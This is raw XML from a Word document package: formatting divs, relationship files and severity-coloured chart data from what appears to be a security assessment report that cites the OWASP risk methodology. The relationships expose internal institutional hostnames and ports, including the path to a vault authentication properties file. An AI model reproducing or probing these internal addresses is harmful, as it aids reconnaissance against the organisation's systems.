      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1589076264">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1608079312">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1617323247">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1624849263">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1657876905">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1661929334">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1721006715">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1728339990">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1730348314">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1734884715">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1745761190">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1751194445">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1803040440">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1841235321">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1844465489">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1858153377">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1902979755">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911647576">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1912884208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1916501895">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964266448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1996303052">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2034770251">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="32584083">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="146869546">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="574900033">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="723138214">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1136143082">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1473136908">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1979652184">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2046564401">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2049068212">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2055275840">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2068142095">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2069187695">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2117363696">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2121559726">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2122532477">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1800567867">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1794860445">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2034451333">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1292319324">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1395741022">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="515309857">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1891113536">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="5874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85136">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1548949348">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="3211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714791">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144300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hart" Target="charts/chart1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="cid:image001.png@01DC4A8F.3DCBAFD0" TargetMode="External"/><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hyperlink" Target="http://oid.cc.cec.eu.int:389/CLIMA_EUCR_COP_01_T,cn=OracleContext,dc=prod,dc=cop,dc=cec,dc=eu,dc=int" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId50"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tmmcl00376.cc.cec.eu.int:1051/filesystems/classpathFILE/sam-vault-authentication.properties" TargetMode="Externa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oter" Target="footer4.xml"/><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intragate.ec.europa.eu/tomcatv2hydra/ui/explorer" TargetMode="External"/><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4.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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footer" Target="footer6.xml"/></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://europa.eu/!db43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aLOGIKa\Eurolook\Templates\Eurolook.dot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Findings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rgbClr val="FFC000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>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1-7F70-4907-9834-3675AA65C872}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000006-6268-4F18-A3AF-40FE2D0970B6}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-7F70-4907-9834-3675AA65C872}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-7F70-4907-9834-3675AA65C872}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000007-6268-4F18-A3AF-40FE2D0970B6}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:strRef>
